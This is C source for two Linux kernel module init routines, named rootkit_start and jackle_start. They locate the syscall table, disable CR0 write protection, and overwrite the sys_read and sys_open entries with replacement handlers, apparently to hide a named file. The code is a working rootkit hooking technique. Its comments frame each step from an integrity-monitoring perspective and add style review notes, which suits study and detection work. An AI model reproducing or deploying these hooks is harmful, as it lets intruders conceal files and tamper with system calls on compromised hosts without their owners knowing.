/*
 * Module init: repoints the sys_read slot of the syscall table at
 * new_sys_read, saving the previous pointer in ref_sys_read.
 *
 * From an integrity-monitoring standpoint every step here is an
 * observable event: the CR0 write-protect bit is cleared and restored
 * around the write, and afterwards sys_call_table[__NR_read] no longer
 * matches the kernel's own handler. Statement order is load-bearing:
 * the table write must sit between the two write_cr0() calls.
 *
 * Returns -1 if the table cannot be located, 0 otherwise.
 *
 * NOTE(review): the WP mask is the bare literal 0x00010000 rather than
 * a named bit; the failure path returns a bare -1 instead of a named
 * errno; "aquire" is a misspelling baked into the helper's name, which
 * is defined outside this view and so cannot be corrected here.
 */
static int __init rootkit_start(void)
{
	// Locate the syscall table; bail out if the helper cannot find it
	if(!(sys_call_table = aquire_sys_call_table()))
		return -1;
	// Record the initial CR0 value so it can be restored verbatim below
	original_cr0 = read_cr0();
	// Clear the write-protect bit in CR0 so the table page becomes writable
	write_cr0(original_cr0 & ~0x00010000);
	// Save the current sys_read pointer before it is overwritten
	ref_sys_read = (void *)sys_call_table[__NR_read];
	// Overwrite the sys_read slot; this is the change an integrity check
	// against the expected table contents would surface
	sys_call_table[__NR_read] = (unsigned long *)new_sys_read;
	// Restore CR0 (write protection back on)
	write_cr0(original_cr0);
	return 0;
}
/*
 * Module init: repoints the sys_read and sys_open slots of the syscall
 * table at new_sys_read and new_sys_open, saving the previous pointers
 * in ref_sys_read and ref_sys_open (presumably for a later restore
 * path that is not visible here).
 *
 * Defender's view: besides the modified table entries and the CR0
 * write-protect toggle, this variant logs each stage to the kernel
 * log at KERN_INFO, including the plaintext value of file_to_hide, so
 * the ring buffer itself records what was patched and what is being
 * concealed. Statement order is load-bearing: both table writes must
 * sit between the two write_cr0() calls.
 *
 * Returns -1 if the table cannot be located, 0 otherwise.
 *
 * NOTE(review): same remarks as for the sys_read-only variant: bare
 * 0x00010000 mask, bare -1 on failure, "aquire"/"Aquired" misspellings
 * (the log string is runtime text and is left as written).
 */
static int __init jackle_start( void )
{
	// Banner line in the kernel log
	printk( KERN_INFO "[+] J A C K A L\n" );
	// Locate the syscall table; bail out if the helper cannot find it
	if( !( sys_call_table = aquire_sys_call_table() ) )
		return -1;
	// Record the initial CR0 value so it can be restored verbatim below
	original_cr0 = read_cr0();
	printk( KERN_INFO " |- Aquired sys_call_table\n" );
	// Clear the write-protect bit in CR0 so the table page becomes writable
	write_cr0( original_cr0 & ~0x00010000 );
	printk( KERN_INFO " |- Unlocked table!!\n" );
	// Save both current handlers before either slot is overwritten
	ref_sys_read = ( void * )sys_call_table[__NR_read];
	ref_sys_open = ( void * )sys_call_table[__NR_open];
	// Overwrite the two slots; these are the entries an integrity check
	// against the expected table contents would surface
	sys_call_table[__NR_read] = ( unsigned long * )new_sys_read;
	printk( KERN_INFO " |- Patched sys_read\n" );
	sys_call_table[__NR_open] = ( unsigned long * )new_sys_open;
	printk( KERN_INFO " |- Patched sys_open\n" );
	// The concealed filename is written to the kernel log in plaintext
	printk( KERN_INFO " | ` hiding %s\n", file_to_hide );
	// Restore CR0 (write protection back on)
	write_cr0( original_cr0 );
	return 0;
}